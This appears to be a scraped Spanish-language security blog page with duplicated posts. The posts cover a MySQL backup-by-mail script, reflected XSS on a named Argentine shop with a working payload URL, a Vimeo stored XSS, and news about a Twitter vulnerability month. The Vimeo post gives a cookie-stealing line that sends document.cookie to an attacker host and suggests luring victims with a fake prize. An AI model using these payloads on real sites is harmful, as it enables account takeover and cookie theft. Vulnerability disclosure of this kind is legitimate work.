F1: Cataluña: Segunda posición con sabor a victoria
Hace 14 años
Sistema de backup Cronos por Mail(Ragnarok y demas Mmorpgs)
Como prometi ya hace tiempo, aqui teneis un script bash para hacer backups de modo facil.
[FAQ] Backups de tu base de datos comprimidos por mail
Autor: Jubjub
1.-Instalacion
Cread un archivo en vuestro dedicado linux, introducid el texto anterior en el, sustituyen la password de root mysql donde indica, dadle permisos con el comando
Una vez hecho esto, cread un archivo llamado mes.txt, y introducid en el el texto que acompañara al backup en vuestro mail.
y estara listo para su uso :D
2.-Forma de uso
Para utilizarlo, teneis que utilizar el comando, estando en la carpeta donde guardasteis el script:
[FAQ] Backups de tu base de datos comprimidos por mail
Autor: Jubjub
Código: [Seleccionar]
mysqldump --user=root --password=AQUITIENESQUEPONERTUPASSWORD $1 > ${1}.sql
FECHA=`date +%d-%m`
zip ${FECHA}_${1}_dump.zip ${1}.sql
rm -f *.sql
mutt -s "Backup Servidor ${FECHA}" -a *.zip $2 < mes.txt
rm -f *.zip
1.-Instalacion
Cread un archivo en vuestro dedicado linux, introducid el texto anterior en el, sustituyen la password de root mysql donde indica, dadle permisos con el comando
Citar
chmod 700 nombrearchivo
Una vez hecho esto, cread un archivo llamado mes.txt, y introducid en el el texto que acompañara al backup en vuestro mail.
y estara listo para su uso :D
2.-Forma de uso
Para utilizarlo, teneis que utilizar el comando, estando en la carpeta donde guardasteis el script:
Código: [Seleccionar]
./nombrescript nombrebasededatos email
Y recibireis en vuestro mail el archivo sql de la base de datos comprimido en zip. Podeis automatizarlo para tener backups seghuros que no perdereis en caso de fallo en el dedicado!
Bippie Argentina: XSS Pwned
Ante todo gracias a Skeletron, de ElHacker.net, por avisarme de este garrafal fallo
Vamos a revisar uno de los fallos que presenta esta conocida web
(si fallan a este nivel, no hay duda de que también tendrán SQLi, dejo la tarea a investigar al que le interese 
)
Simplisimo!, solo tenemos que escaparnos de la etiqueta <>, y a inyectar html se ha dicho
Por esto, es por lo que debeis de recordar siempre, que al mostrar texto que es proporcionado por el cliente, hay que colocar un htmlspecialchars().
Un saludo, y hasta la próxima!
PD: He tenido que colocar la url codificada poraque me causaba a mi mismo un XSS
Vamos a revisar uno de los fallos que presenta esta conocida web
(si fallan a este nivel, no hay duda de que también tendrán SQLi, dejo la tarea a investigar al que le interese )http://ar.bippie.com/modules/catalog/prodinfo.php?categoria=%3C/title%3E%3Cscript%3Ealert%20%28%22Jugando%20con%20Fosforos%22%29;%3C/script%3E&sub_categoria=rock+nacional&nombre=solotelscompatibles&sbrand=5&smodel=8%2F826#4130952372793495685
Simplisimo!, solo tenemos que escaparnos de la etiqueta <>, y a inyectar html se ha dicho
Por esto, es por lo que debeis de recordar siempre, que al mostrar texto que es proporcionado por el cliente, hay que colocar un htmlspecialchars().
Un saludo, y hasta la próxima!
PD: He tenido que colocar la url codificada poraque me causaba a mi mismo un XSS
XSS + Robo de Cookies en Vimeo
Mientras comprobaba esa leyenda urbana de que Vimeo es mejor que Youtube, encontré un XSS, que aunque tiene una cierta dificultad de explotar, puede ser interesante de investigar.
El fallo en cuestión se encuentra en la opción de añadir créditos, que tenemos disponible en cualquier vídeo. No filtra en absoluto html, que podemos introducir sin mas problema.
La parte interesante es que esto es una llamada AJAX, que por falta de tiempo no he podido seguir investigando, aunque probablemente lo haré en algún post, mas adelante.
Haz click para ver la imagen a tamaño completo
El fallo en cuestión se encuentra en la opción de añadir créditos, que tenemos disponible en cualquier vídeo. No filtra en absoluto html, que podemos introducir sin mas problema.
La parte interesante es que esto es una llamada AJAX, que por falta de tiempo no he podido seguir investigando, aunque probablemente lo haré en algún post, mas adelante.
Haz click para ver la imagen a tamaño completo
Aquí podemos ver un XSS inofensivo, aunque podría utilizarse para robar las cookies, consiguiendo así privilegios completos, un ejemplo seria este código:
El código del PHP simplemente guardaría a un archivo de texto plano el contenido de la variable galleta, con lo cual solo nos quedaría robar esas cookies, teniendo acceso completo a la cuenta afectada.
Aun así, al no haber un método directo (o no descubierto) de hacer esto, como puede ser en los XSS por link, habría que hacer un poco de uso de ingeniería social, quizás en un vídeo dejar el código, prometiendo un premio si se introducen como créditos en el mismo vídeo, añadiendo al final el "código del vídeo", que no seria mas que nuestro XSS.
<>document.location="http://webatacante.net/galleta.php?galleta="+document.cookie;< /script >
El código del PHP simplemente guardaría a un archivo de texto plano el contenido de la variable galleta, con lo cual solo nos quedaría robar esas cookies, teniendo acceso completo a la cuenta afectada.
Aun así, al no haber un método directo (o no descubierto) de hacer esto, como puede ser en los XSS por link, habría que hacer un poco de uso de ingeniería social, quizás en un vídeo dejar el código, prometiendo un premio si se introducen como créditos en el mismo vídeo, añadiendo al final el "código del vídeo", que no seria mas que nuestro XSS.
TwitPwn: Desarrolladores sin vacaciones
Parece que la fiebre del Twitter les va a dar a algunos dolores de cabeza: Aviv Raff, que ya participo en "El mes de las vulnerabilidades en los navegadores", evento que se llevo a cabo con éxito, ha anunciado en TwitPwn que juli sera el "Mes de las vulnerabilidades Twitter"
Planea lanzar una al dia, la mayoia relacionadas con la API de Twitter, y aplicaciones de terceros. Al menos avisará a los desarrolladores con 24 horas de antelacion, ya que segun el, "las vunerabilidades podrian ser utilizadas para crear un worm-Twitter"
Asi que me temo que los desarolladores afectados van a pasar un mes movidito
Me entere de esto via SbD
Planea lanzar una al dia, la mayoia relacionadas con la API de Twitter, y aplicaciones de terceros. Al menos avisará a los desarrolladores con 24 horas de antelacion, ya que segun el, "las vunerabilidades podrian ser utilizadas para crear un worm-Twitter"
Asi que me temo que los desarolladores afectados van a pasar un mes movidito
Me entere de esto via SbD
Suscribirse a:
Entradas (Atom)
